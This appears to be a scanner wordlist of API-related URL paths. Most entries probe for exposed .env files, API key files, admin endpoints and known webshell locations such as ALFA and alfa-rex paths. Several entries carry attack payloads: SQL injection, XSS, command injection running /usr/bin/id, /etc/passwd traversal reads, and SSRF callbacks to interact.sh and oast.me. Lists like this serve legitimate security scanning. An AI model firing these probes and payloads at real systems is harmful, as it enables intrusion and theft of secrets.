/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/
/horizon/api/stats
/hub/api
/hx/api/about
/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus
/images/ALFA_DATA/alfacgiapi/perl.alfa
/index.cfm/_api/json/v1/default/?method=processAsyncObject
/index.php/api/modular-connector/login/losxh?origin=mo&type=foo
/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5(999999999)%27
/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php
/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(999999999),0x7e),1)
/index/class.api.php
/inlong/manager/api/anno/login
/internal-api/
/js/filemanager/api/index.php
/js/tiny_mce/plugins/ajaxfilemanager/class.api.php
/jsapi_ticket.json
/jscript/tiny_mce/plugins/ajaxfilemanager/class.api.php
/jsonapi/user/user
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/kiali/api/status
/kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10
/kubepi/api/v1/users
/kylin/api/admin/config
/kylin/api/user/authentication
/lab/api/settings/
/lighter/api
/message-api/actuator/env
/mifs/aad/api/v2/admins/users
/mifs/asfV3/api/v2/admins/users
/mifs/c/windows/api/v2/device/registration
/mifs/rs/api/v2/device/registration
/mobile/api/api.ali.php
/module/api.php?mobile/webNasIPS
/modules/ibm_apim/ibm_apim.info.yml
/moveitisapi/moveitisapi.dll?action=m2
/musicstation/api/as_get_file_api.php
/nifi-api/access/config
/nifi-api/controller/config
/nifi-api/flow/about
/nifi-api/flow/process-groups/root
/nifi-api/process-groups/root
/node-api/.env
/nodeapi/.env
/nodeapi/.env.bak
/openapi
/openapi.json
/openapi.yaml
/openapi/swagger/
/openapi/v2
/oputilsServlet?action=getAPIKey
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/zqsD.css
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/photo-gallery/api/album/tree_lists/
/photo-gallery/api/photo/search/
/photo/p/api/album.php
/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1
/phpinfo-api
/phpinfoapi
/pimcore/app/config/pimcore/google-api-private-key.json
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/pipeline/apis/v2beta1/pipelines
/plugins/ajaxfilemanager/class.api.php
/plugins/content/apismtp/apismtp.php
/portalapi/actuator
/postmark_api_key.txt
/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/proxy?url=http://127.0.0.1:8025/api/v1/info
/prweb/PRRestService/unauthenticatedAPI/v1/docs
/public/login.htm?file=/api/addusers.htm
/query-api
/rails-api/react-app/.env
/rapi/filedownload?filter=path:%2Fetc%2Fpasswd
/reports/api/v2.0/System
/rest/api/2/dashboard?maxResults=100
/rest/api/2/project?maxResults=100
/rest/api/2/projectCategory?maxResults=1000
/rest/api/2/resolution
/rest/api/2/screens
/rest/api/2/serverInfo
/rest/api/2/user/picker?query
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
/rest/api/latest/repos
/rest/api/latest/serverInfo
/restapi/.env
/rpc/api/rest/master/user/createInternalUser;/keepalive
/sapi/debug/default/view
/sdapi/v1/cmd-flags
/sdapi/v1/memory
/sdapi/v1/options
/sdapi/v1/samplers
/sdapi/v1/sd-models
/sendgrid_api_key.txt
/server/index.php?s=/api/user/login
/sg_api_key.txt
/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename
/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/shopify_api
/sitecore/api/ssc/auth/login
/sources/api/.env
/src/api/config.js
/staging-api/
/staging/api/.env
/strapi/.env
/streampipes-backend/api/openapi.json
/streampipes-backend/api/v2/auth/settings
/stripe_api_key.txt
/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh
/test-api/
/test/bdd/fixtures/demo/openapi/.env
/test/bdd/fixtures/openapi-demo/.env
/tiny_mce/plugins/ajaxfilemanager/class.api.php
/tmp_images/alfacgiapi/perl.alfa
/uapim/static/pages/53/head.jsp
/uapim/upload/grouptemplet?groupid=53&fileType=jsp
/ucmdb-api/connect
/ui/api/v1/global-search/builds?jfLoader=true
/ui/gradio_api/file=https://oast.me
/umbraco/management/api/v1/server/status
/userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all
/v1/api/chats
/v1/api/datasets
/v1/api/graphql
/v2/api-docs
/v2/api/graphql
/v2/api/product/manger/getInfo
/v3/api-docs
/v3/api/graphql
/v4/api/graphql
/vendor/api-config.ini
/web/api/config.js
/webapi/auth
/webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup
/webapi/ping
/webapi/v1/system/accountmanage/account
/webhook/api/asset
/webhook/api/assets
/webhook/api/attachment
/webhook/api/attachments
/webhook/api/avatar
/webhook/api/blob
/webhook/api/content
/webhook/api/document
/webhook/api/documents
/webhook/api/file
/webhook/api/files
/webhook/api/image
/webhook/api/images
/webhook/api/import
/webhook/api/media
/webhook/api/storage
/webhook/api/submit
/webhook/api/upload
/webhook/api/uploads
/wix-api
/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa
/wp-admin/alfacgiapi/perl.alfa
/wp-admin/css/colors/blue/class.api.php
/wp-admin/images/class.api.php
/wp-admin/includes/class.api.php
/wp-admin/js/class.api.php
/wp-admin/js/widgets/class.api.php
/wp-admin/maint/class.api.php
/wp-admin/network/class.api.php
/wp-admin/user/class.api.php
/wp-api.php
/wp-content/ALFA_DATA/alfacgiapi/
/wp-content/ALFA_DATA/alfacgiapi/perl.alfa
/wp-content/alfacgiapi/perl.alfa
/wp-content/class.api.php
/wp-content/languages/class.api.php
/wp-content/languages/themes/class.api.php
/wp-content/plugins/class.api.php
/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json
/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/token_info.json
/wp-content/plugins/envato-market/inc/class-envato-market-api.php
/wp-content/plugins/fast-indexing-api/readme.txt
/wp-content/plugins/google-site-kit/third-party/google/apiclient-services/src/Google/Service/AdSense/Resource/Accounts.php
/wp-content/plugins/hellopress/class.api.php
/wp-content/plugins/json-api-user/changelog.txt
/wp-content/plugins/mstore-api/
/wp-content/plugins/mstore-api/readme.txt
/wp-content/plugins/woocommerce-legacy-rest-api/readme.txt
/wp-content/plugins/wordfence/lib/wfAPI.php
/wp-content/themes/haberadam/api/mobile-info.php?id
/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/wp-content/uploads/class.api.php
/wp-includes.bak/html-api/about.php
/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa
/wp-includes/SimplePie/class.api.php
/wp-includes/alfacgiapi/perl.alfa
/wp-includes/certificates/class.api.php
/wp-includes/class.api.php
/wp-includes/customize/class.api.php
/wp-includes/html-api/about.php
/wp-includes/html-api/alfa-rex.php
/wp-includes/html-api/index.php
/wp-includes/html-api/wp-load.php
/wp-includes/html-api/wp-login.php
/wp-includes/interactivity-api/about.php
/wp-includes/interactivity-api/alfa-rex.php
/wp-includes/interactivity-api/index.php
/wp-includes/interactivity-api/wp-login.php
/wp-includes/pomo/class.api.php
/wp-includes/rest-api/023ws.php
/wp-includes/rest-api/about.ph
/wp-includes/rest-api/about.php
/wp-includes/rest-api/admin-ajax.php
/wp-includes/rest-api/alfa-rex.php
/wp-includes/rest-api/alfa-rex.php7
/wp-includes/rest-api/autoload_classmap.php
/wp-includes/rest-api/av.php
/wp-includes/rest-api/block-css.php?mode=upload
/wp-includes/rest-api/class.api.php
/wp-includes/rest-api/classwithtostring.php
/wp-includes/rest-api/endpoints/about.php
/wp-includes/rest-api/endpoints/alfa-rex.php
/wp-includes/rest-api/endpoints/index.php
/wp-includes/rest-api/endpoints/wp-login.php
/wp-includes/rest-api/fields/about.php
/wp-includes/rest-api/fields/alfa-rex.php
/wp-includes/rest-api/fields/cache/simple.php
/wp-includes/rest-api/fields/index.php
/wp-includes/rest-api/fields/wp-login.php
/wp-includes/rest-api/index.php
/wp-includes/rest-api/indexx.php
/wp-includes/rest-api/menu.php
/wp-includes/rest-api/nav.php
/wp-includes/rest-api/rk2.php
/wp-includes/rest-api/search/about.php
/wp-includes/rest-api/search/alfa-rex.php
/wp-includes/rest-api/search/index.php
/wp-includes/rest-api/search/wp-login.php
/wp-includes/rest-api/wp-login.php
/wp-includes/rest-api/wp-sys.php
/wp-includes/rest-api/wp-sys.php?p=
/wp-includes/rest-api/wp-term.php
/wp-includes/rest-api/wp-ver.php
/wp-includes/rest-api/wp_error.php
/wp-includes/rest-api/wp_filemanager.php
/wp-includes/rest-api/wp_project.php
/wp-json/api/flutter_multi_vendor/product-categories
/wp-json/api/flutter_user/apple_login
/wp-json/api/flutter_woo/cart
/wp-json/bbp-api/v1/users
/wp-json/click5_sitemap/API/update_html_option_AJAX
/wp-json/notificationx/v1/notification/1?api_key=1730bbf31842f5d165ffadea6a064650&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6))
/ws-api/v2/users/me/details?token=02
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/x/..//RestAPI/LicenseMgr
